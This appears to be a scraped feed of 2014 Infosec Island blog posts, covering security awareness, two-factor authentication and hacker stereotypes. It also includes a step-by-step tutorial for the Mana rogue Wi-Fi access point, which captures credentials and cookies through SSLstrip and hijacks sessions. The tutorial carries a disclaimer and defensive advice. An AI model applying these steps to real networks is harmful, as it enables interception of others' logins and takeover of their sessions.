These six actions are just the start of improving, or building, your information security and privacy program into one that is effective, comprehensive and up-to-date. And certainly every organization, of every size, in every location, in every industry, needs to have an effective, comprehensive information security and privacy program in place. Doing the six actions listed above will help you to see where you need to make improvements. Every month should really be Cyber Security Awareness Month for all organizations.

This was cross-posted from the Privacy Professor blog.

Copyright 2010 Respective Author at Infosec Island]]>
Mana Tutorial: The Intelligent Rogue Wi-Fi Router Tue, 21 Oct 2014 11:59:41 -0500 “Mana” by Dominic White (singe) & Ian de Villiers at Sensepost, is an amazing full feature evil access point that does, well, just about everything. Just install and run it and you will in essence receive Wi-Fi credentials or “Mana” from heaven!

Here is a link to the creator’s Defcon 22 presentation:

Not sure where to start with this one. Like other rogue Wi-Fi AP programs Mana creates a rogue AP device, but Mana does so much more.

It listens for computers and mobile devices to beacon for preferred Wi-Fi networks, and then it can impersonate that device.

Once someone connects to the rogue device, it automatically runs SSLstrip to downgrade secure communications to regular HTTP requests, can bypass/redirect HSTS, allows you to perform MitM attacks, cracks Wi-Fi passwords, grabs cookies and lets you impersonate sessions with Firelamb.

But that is not all; it can also impersonate a captive portal and simulate internet access in places where there is no access.

Mana is very effective and, well, pretty scary!

Before we get started, for best success use Kali Linux v.1.08.

And as always, this article is for educational purposes only, never try to intercept someone else’s wireless communications. Doing so is illegal in most places and you could end up in jail.

Mana Tutorial

1. Download and unzip Mana from
2. Run the install

Mana will then install libraries and other dependencies to work properly.

Once completed the install places the Mana program in the /usr/share/mana-toolkit directory, config files in /etc/mana-toolkit, and log files and captured creds in /var/lib/mana-toolkit.

3. Open the main config file /etc/mana-toolkit/hostapd-karma.conf

Here you can set several of the options including the default Router SSID which by default is “Internet”. Something like “Public Wi-Fi” may be more interesting. The other main setting here is “karma_loud” which sets whether mana impersonates all AP’s that it detects or not.

Lastly, all we need to do is run one of Mana’s program scripts located in usr/share/mana-toolkit/run-mana. The scripts are:


Mana Scripts

For this tutorial let’s just run Mana’s main “full” attack script.

4. Attach your USB Wi-Fi card (TL-WN722N works great).
5. Type “iwconfig” to be sure Kali sees it.


6. Type, “./” to start Mana.

Mana then starts the evil AP, SSLstrip and all the other needed tools and begins listening for traffic:

Mana running

Once someone connects, Mana will display and store any creds and cookies detected as the victim surfs the web.

7. When done, press “Enter” to stop Mana

To check what you have captured run to view captured cookie sessions:

Mana firelamb

This asks which session you want to try from the captured cookie sessions. It then tries to open the session in Firefox. If the user is still logged in you could take over their session.

You can also review the log files manually in /var/lib/mana-toolkit.

Mana works equally well against laptops and mobile devices. And the inherent trust of “preferred Wi-Fi networks” that most systems use makes this tool very effective at intercepting and impersonating wireless routers.

To defend against this type of attack turn off your wi-fi when not in use. Be very careful of using free or public Wi-Fi networks. Also, it would be best to perform any secure transactions over a wired LAN instead of using Wi-Fi!

If you enjoyed this tutorial and want to learn more about computer security testing, check out my book, “Basic Security Testing with Kali Linux“.

This was cross-posted from the Cyber Arms blog.

Copyright 2010 Respective Author at Infosec Island]]>
Why Two-Factor Authentication is Too Important to Ignore Tue, 21 Oct 2014 11:46:56 -0500 In August, it happened again: a headline-grabbing warning that 1.2 billion passwords had been stolen by a Russian cyber gang, dubbed CyberVor, caused quite a stir. While questions were raised about the legitimacy of the CyberVor report and the scant details surrounding it in the past, these types of events did not even make it into specialized magazines and news services, much less major news outlets. And if they did, superlatives were required to capture anyone’s attention. However, just because password theft may not always garner a big news report, it doesn’t mean it isn’t happening all the time.

On the contrary, and especially during the past year, quite a few companies have admitted to being victimized by data breaches and losing control of large amounts of data. Big retail chains Home Depot and Target experienced security breaches that culled information from more than 100 million cards combined, while 233 million eBay users were put at risk of identity theft after an online security breach. 

Going forward, we have to be prepared for the possibility that private information provided to a third party, like a merchant or a public agency, will be stolen. What does this mean for the security of user passwords? “Set it and forget about it” password security simply does not exist anymore. Passwords today can only be regarded as a temporary security measure that should be limited in both time of use and number of accounts.

Nevertheless, experience shows that users recycle the same password for many or all of their accounts. For many, it’s just not feasible to memorize dozens of unique passwords that are sufficiently strong.

Users can avoid this problem and improve their data security by implementing a secure password safe, such as 1Password or KeePass, on their end devices and by using a really strong password to secure it. The safe contains the passwords of all accounts and automatically applies them during the login procedure.

Two-factor authenticationis equally as safe. In addition to a password, the user is required to have a second component for verification. With this method, the user has to combine knowledge (password) and ownership (mobile phone, token).

Two-factor authentication has long been a standard for safety-critical applications. For example, it has been possible for years to secure VPN remote access using a second authentication factor. In the past, the “something you have” component of two-factor authentication consisted of a small token displaying a number necessary for login. The user had to enter this one-time password (OTP) in addition to the password. Now, other solutions are available that do not require the use of tokens. Select VPN solutions with Secure Enterprise Management (SEM) capabilities, for example, allow for use of OTP with mobile phones or smartphones.

With the exception of online banking providers, websites have rarely offered two-factor authentication. However, due to the increasing frequency of data theft, more sites are offering it. For example, Microsoft (OneDrive,, etc.) and Facebook now offer two-factor authentication, and Dropbox can also be secured with a second login factor. This added layer of security helps reduce the risk of data theft even if a user could not resist picking his pet’s name for a password, or if he decided to pick the most popular password worldwide: “123456.”

This was cross-posted from the VPN HAUS blog.

Copyright 2010 Respective Author at Infosec Island]]>
Hacker Myths Debunked Mon, 20 Oct 2014 12:12:23 -0500 By: David Bisson

We’ve been hearing a lot about hackers recently, mostly in connection to serious data breaches. We think of hackers compromising the nude photographs of popular female celebrities, including Jennifer Lawrence and Kate Upton. We think of them stealing 56 million Home Depot customers’ credit card information. Or using Backoff malware to infiltrate Kmart or Dairy Queen.

All of these incidents teach us to think of hackers as nefarious individuals.They will stop at nothing to degrade our privacy, steal our identities, and ruin our experiences in cyberspace. Their craft is dishonorable, and so they deserve to be hated—and feared.

But is this stereotypical? Are all hackers like this?

In honor of National Cyber Security Awareness Month, which aims to improve user awareness about cyber threats online, below we problematize some of the most common hacker stereotypes we’ve come to learn and love. We do this in an effort to appreciate hacking for the complicated, variable and highly individualized practice that it is.

   Myth #1: Hackers Are Maladjusted Young People Who Live In Their Mothers’ Basements

shutterstock_150161756We all know this one quite well. Some of the most dangerous hackers—the myth goes—wear black T-shirts, have long hair and are under 30 years of age. They spend all of their time on the computer – a passion which they use to isolate themselves from the rest of society. They are weird and maladjusted, which helps to explain why they want to do what they do.

Sure, there might be hackers that fit this stereotype but countless others do not. Take the idea that hackers spend endless hours at the computer—this is a common misperception of computer scientists that, despite its wide appeal, doesn’t hold any water. In fact, many hackers have balanced relationships with their computers while others even have “day jobs” and just hack on the side.

Hackers can have healthy relationships with their peers and families and have proven records of academic excellence in school. Some may be young, but others are not, having spent decades accumulating their technical expertise. Many are well-adjusted to society, which in one light could make some hackers more dangerous.

John Walker, CTO of the Cytelligence Cyber Forensics OSINT Platform and a Blogger for Tripwire, explains: “There are [some] in our midst equally dangerous and very well accomplished over a number of years in which they have learned their trade, honed their skills, and could just be that guy sitting next to you in your office – so think again, don’t make too many preconceived judgements, and remember to consider the ‘Unusual Suspect Factor.’”

Myth #2: Hacking Is A “Boys Only” Club

shutterstock_158390291Hacking may be a predominantly male activity but that doesn’t mean that there aren’t female hackers out there. For instance, a loose 22-year-old group of women known as Haecksen, a hacker club that uses for its name the German word for “witch,” helped organize the Chaos Computer Club (CCC) Congress in 2010.

Other female hackers have spoken at DefCon or write viruses that destroy information instead of stealing it. We might hear the most about male hackers, but women are just as active in hacking communities.

Myth #3: All Hackers Are Masters of Their Craft

The way we paint hackers today elevates them to a level of unmatched technical prowess. Using this platform of expertise, they compromise any system they want with ease, regardless of whatever security protocols may be in place. Subsequently, as information security professionals, we are forced to play defense against these computer masters. shutterstock_131313473

Mark Stanislav, Security Project Manager at Duo Security, explains this is not always the case: “Manipulation of systems is often as predictable as watching the sunrise from the east every morning. After enough practice and/or education, a hacker of a specific context can likely say, ‘Oh, I’d totally try to do XYZ to hack that’ given a scenario.”

Additionally, not all hackers are necessarily skilled computer programmers. Sometimes all hackers need to know is where to look with respect to a particular system configuration or maybe they let a tool do that for them, despite having minimal understanding of how the tool works. Ultimately, we all know that it doesn’t take a computer expert to break into a network.

Myth #4: All Hacking Is Bad

The notion that all hackers intend to cause harm is one of the biggest hacking myths today. Lamar Bailey, Director of Security R&D at Tripwire, says:

shutterstock_169402199“Hacking systems to gain access to data or features that are denied to the current user is the most popular definition that most people think of when it comes to hackers, but it goes much deeper. Hacking hardware to add new features has become a very popular way to extend the life and increase the security of all devices in our homes.”

Ultimately, hacking has less to do with compromising data then with developing creative solutions to technical problems. Ken Westin of Tripwire rightly notes this fact: “Hacking is about understanding the underlying nature of technology—knowing specifically how things work from a high level all the way down to its most granular components. When you fully understand how things work, there is power in being able to manipulate it, shape it and utilize it in ways it may not have been intended to.”

In this sense, hacking, like many other things, comes down to intentions. Ethical hacking can improve the security of various products, whereas malicious hacking seeks to undermine data integrity. It’s how people hack which shapes the nature of a particular incident.

Hacking In All Its Colors

We hear a lot about hackers these days, but mainly those who are after people’s personal and financial information. The majority of hackers out there aren’t social miscreants who are technical masters bent on shutting down the Internet. They may be less knowledgeable, or they may be in the hacking business for the sake of computer security. The sooner we realize hacking’s variability, the sooner we can champion the whitehats who are helping to protect us, and the sooner we can broaden our focus to target those who threaten our security online.

This was cross-posted from Tripwire's The State of Security blog.

Copyright 2010 Respective Author at Infosec Island]]>